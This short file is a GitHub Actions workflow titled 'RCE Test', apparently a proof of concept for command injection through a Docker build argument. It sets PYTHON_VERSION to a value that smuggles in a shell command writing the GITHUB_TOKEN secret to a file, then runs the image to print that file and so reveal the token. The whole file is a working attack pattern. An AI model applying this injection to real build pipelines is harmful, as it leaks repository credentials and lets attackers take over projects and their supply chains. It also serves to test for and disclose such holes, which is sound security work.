name: RCE Test

on: push

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Build Docker with injected ARG
        run: |
          docker build --build-arg PYTHON_VERSION='echo "GITHUB_TOKEN=$GITHUB_TOKEN" > /leak' -f taskcluster/docker/python/Dockerfile -t rce-image .

      - name: Show leaked token
        run: |
          docker run rce-image cat /leak || echo "No leak"
